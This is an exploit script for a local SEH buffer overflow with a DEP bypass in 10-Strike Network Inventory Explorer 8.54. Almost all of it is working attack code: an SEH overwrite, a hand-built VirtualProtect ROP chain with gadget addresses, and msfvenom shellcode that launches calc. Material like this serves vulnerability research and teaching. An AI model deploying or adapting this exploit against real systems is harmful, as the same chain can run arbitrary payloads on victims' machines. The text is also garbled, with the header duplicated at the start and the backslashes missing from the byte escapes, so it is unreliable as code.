10-Strike Network Inventory Explorer 8.54 Local Buffer Overflow

#!/usr/bin/python

# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)
# Date: 01 #!/usr/bin/python

# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)
# Date: 01-29-19
# Vulnerable Software: 10-Strike Network Inventory Explorer 8.54
# Vendor Homepage: https://www.10-strike.com/
# Version: 8.54
# Software Link 1: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Tested Windows 7 SP1 x86

# PoC
# 1. run script
# 2. open app, select Computers tab
# 3. click on 'From Text File'
# 4. choose 10strike.txt that was generated
# 5. pop calc

# manually created ropchain based on mona.py 'rop.txt' and 'ropfunc.txt' finds
# practicing dep bypass by not using auto generated mona.py ropchains

# original seh poc from Hashim Jawad, EDB: 44838
# notes from author state offset is based upon username size, username for poc is 'user'

# badchars; x00x0ax0dx2f

import struct

filename = "10strike.txt"

junk = "x41" * 209

seh = struct.pack('<L',0x10013e29)

fill = "x42"*12

#VirtualProtect()
#ESI = ptr to VirtualProtect()
rop = struct.pack('<L',0x7c3762b3) # POP EAX # RETN
rop += struct.pack('<L',0x61e9b30c) # ptr to &VirtualProtect()
rop += struct.pack('<L',0x1001872e) # MOV EAX,DWORD PTR DS:[EAX] # RETN
rop += struct.pack('<L',0x100101f2) # POP EBX # RETN
rop += struct.pack('<L',0xffffffff) #
rop += struct.pack('<L',0x100186d1) # ADD EBX,EAX # XOR EAX,EAX # RETN
rop += struct.pack('<L',0x7c358a01) # INC EBX # XOR EAX,EAX # RETN
rop += struct.pack('<L',0x7c3501d5) # POP ESI # RETN
rop += struct.pack('<L',0xffffffff) #
rop += struct.pack('<L',0x61e8509c) # ADD ESI,EBX # RETN
rop += struct.pack('<L',0x7c370464) # INC ESI # RETN

#EBP = ReturnTo (ptr to jmp esp)
#mona.py jmp -r esp -cpb 'x00x0ax0d'
rop += struct.pack('<L',0x61e05892) # POP EBP # RETN
rop += struct.pack('<L',0x61e053a9) # push esp # ret

#EBX = dwSize x201
rop += struct.pack('<L',0x7c348495) # POP EAX # RETN
rop += struct.pack('<L',0xfffffdff) #
rop += struct.pack('<L',0x7c351e05) # NEG EAX # RETN
rop += struct.pack('<L',0x100101f2) # POP EBX # RETN
rop += struct.pack('<L',0xffffffff) #
rop += struct.pack('<L',0x61e0579d) # INC EBX # RETN
rop += struct.pack('<L',0x100186d1) # ADD EBX,EAX # XOR EAX,EAX # RETN

#EDX = NewProtect (0x40)
rop += struct.pack('<L',0x7c344160) # POP EDX # RETN
rop += struct.pack('<L',0xffffffc0) #
rop += struct.pack('<L',0x7c351eb1) # NEG EDX # RETN

#ECX = lpOldProtect (ptr to W address)
rop += struct.pack('<L',0x7c37157a) # POP ECX # RETN
rop += struct.pack('<L',0x61e894c0) # &Writable location sqlite3

#EDI = ROP NOP (RETN)
rop += struct.pack('<L',0x1001ab53) # POP EDI # RETN
rop += struct.pack('<L',0x1001ab54) # ROP-NOP

#EAX = NOP (0x90909090)
rop += struct.pack('<L',0x7c3647cc) # POP EAX # RETN
rop += struct.pack('<L',0x90909090) # nop

#PUSHAD
rop += struct.pack('<L',0x10019094) # PUSHAD # RETN

nops = "x90"*10

#msfvenom -p windows/exec cmd=calc.exe -b 'x00x0ax0dx3ax5c' -f python
#Payload size: 220 bytes
calc = ""
calc += "xbbx29x86xf9x07xdaxdbxd9x74x24xf4x5ex31"
calc += "xc9xb1x31x31x5ex13x83xeexfcx03x5ex26x64"
calc += "x0cxfbxd0xeaxefx04x20x8bx66xe1x11x8bx1d"
calc += "x61x01x3bx55x27xadxb0x3bxdcx26xb4x93xd3"
calc += "x8fx73xc2xdax10x2fx36x7cx92x32x6bx5exab"
calc += "xfcx7ex9fxecxe1x73xcdxa5x6ex21xe2xc2x3b"
calc += "xfax89x98xaax7ax6dx68xccxabx20xe3x97x6b"
calc += "xc2x20xacx25xdcx25x89xfcx57x9dx65xffxb1"
calc += "xecx86xacxffxc1x74xacx38xe5x66xdbx30x16"
calc += "x1axdcx86x65xc0x69x1dxcdx83xcaxf9xecx40"
calc += "x8cx8axe2x2dxdaxd5xe6xb0x0fx6ex12x38xae"
calc += "xa1x93x7ax95x65xf8xd9xb4x3cxa4x8cxc9x5f"
calc += "x07x70x6cx2bxa5x65x1dx76xa3x78x93x0cx81"
calc += "x7bxabx0exb5x13x9ax85x5ax63x23x4cx1fx9b"
calc += "x69xcdx09x34x34x87x08x59xc7x7dx4ex64x44"
calc += "x74x2ex93x54xfdx2bxdfxd2xedx41x70xb7x11"
calc += "xf6x71x92x71x99xe1x7ex58x3cx82xe5xa4"

pad = "x45"*(3000 - len(junk + seh + fill + rop + nops + calc))

buffer = junk + seh + fill + rop + nops + calc + pad

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()